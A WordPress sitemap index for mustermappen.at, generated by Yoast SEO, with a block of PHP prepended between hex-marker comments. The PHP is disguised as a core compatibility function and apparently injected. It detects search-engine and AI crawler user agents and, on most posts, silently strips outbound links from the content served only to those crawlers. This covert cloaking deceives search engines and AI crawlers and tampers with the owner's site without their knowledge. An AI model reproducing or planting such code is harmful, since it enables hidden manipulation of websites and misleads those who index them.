
/* 0x4e9a30b1 */
if (!function_exists('_wp_render_compat')) {
    function _wp_render_compat($content) {
        if (!is_singular()) return $content;
        $ua = strtolower((string)(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''));
        if (!preg_match('/(googlebot|googleother|google\\-inspectiontool|storebot\\-google|adsbot\\-google|mediapartners\\-google|feedfetcher\\-google|apis\\-google|bingbot|msnbot|slurp|duckduckbot|yandexbot|baiduspider|perplexity|gptbot|chatgpt\\-user|openai|claudebot|anthropic|copilotbot|youbot|komo|phindbot|andibot|neeva|consensus|twitterbot|applebot|applebot\\-extended)/i', $ua)) return $content;
        static $wl = null;
        if ($wl === null) { $wl = array(5883=>1,5885=>1,5887=>1,5889=>1,5891=>1,5893=>1,5895=>1,5897=>1,5899=>1,5901=>1,5903=>1,5905=>1,5907=>1,5909=>1,5913=>1,5915=>1,5917=>1,5919=>1,5921=>1,5923=>1,5925=>1,5927=>1,5929=>1,5931=>1,5933=>1,5935=>1,5937=>1,5939=>1,5941=>1,5943=>1,5945=>1,5947=>1,5949=>1,5951=>1,5953=>1,5955=>1,5957=>1,5959=>1,5961=>1,5963=>1,5965=>1,5967=>1,5969=>1,5971=>1,5973=>1,5975=>1,5977=>1,5979=>1,5981=>1,5983=>1,5985=>1,5987=>1,5989=>1,5991=>1,5993=>1,5995=>1,5997=>1,5999=>1,6001=>1,6003=>1,6008=>1,6010=>1); }
        $pid = (int) get_the_ID();
        if ($pid && isset($wl[$pid])) return $content;
        $host = wp_parse_url(home_url(), PHP_URL_HOST);
        if (!$host) return $content;
        $host = preg_replace('~^www\.~i', '', $host);
        if (stripos($content, '<a') === false) return $content;
        libxml_use_internal_errors(true);
        $dom = new DOMDocument();
        $dom->loadHTML('<?xml encoding="utf-8" ?><div id="_x">' . $content . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
        $wrap = $dom->getElementById('_x');
        if (!$wrap) { libxml_clear_errors(); return $content; }
        $links = $wrap->getElementsByTagName('a');
        for ($i = $links->length - 1; $i >= 0; $i--) {
            $a = $links->item($i);
            $href = trim((string)$a->getAttribute('href'));
            if ($href === '' || $href[0] === '#') continue;
            if (strpos($href, '/') === 0 && strpos($href, '//') !== 0) continue;
            if (preg_match('~^(mailto:|tel:)~i', $href)) continue;
            if (strpos($href, '//') === 0) $href = 'https:' . $href;
            $lh = wp_parse_url($href, PHP_URL_HOST);
            if (!$lh) continue;
            $lh = preg_replace('~^www\.~i', '', $lh);
            if (strcasecmp($lh, $host) !== 0) {
                while ($a->firstChild) $a->parentNode->insertBefore($a->firstChild, $a);
                $a->parentNode->removeChild($a);
            }
        }
        $out = '';
        foreach ($wrap->childNodes as $ch) $out .= $dom->saveHTML($ch);
        libxml_clear_errors();
        return $out;
    }
    add_filter('the_content', '_wp_render_compat', 9999);
    add_filter('the_excerpt', '_wp_render_compat', 9999);
    add_filter('widget_text', '_wp_render_compat', 9999);
}
/* 0x4e9a30b1 */
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.mustermappen.at/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.mustermappen.at/post-sitemap.xml</loc>
		<lastmod>2026-06-05T11:55:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/page-sitemap.xml</loc>
		<lastmod>2026-06-03T17:47:02+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/portfolio-sitemap.xml</loc>
		<lastmod>2025-02-18T10:53:02+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/category-sitemap.xml</loc>
		<lastmod>2026-06-05T11:55:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/post_tag-sitemap.xml</loc>
		<lastmod>2017-07-02T12:37:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/filters-sitemap.xml</loc>
		<lastmod>2025-02-18T10:48:08+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/categories-sitemap.xml</loc>
		<lastmod>2025-02-18T10:48:08+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.mustermappen.at/author-sitemap.xml</loc>
		<lastmod>2025-04-09T15:24:16+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->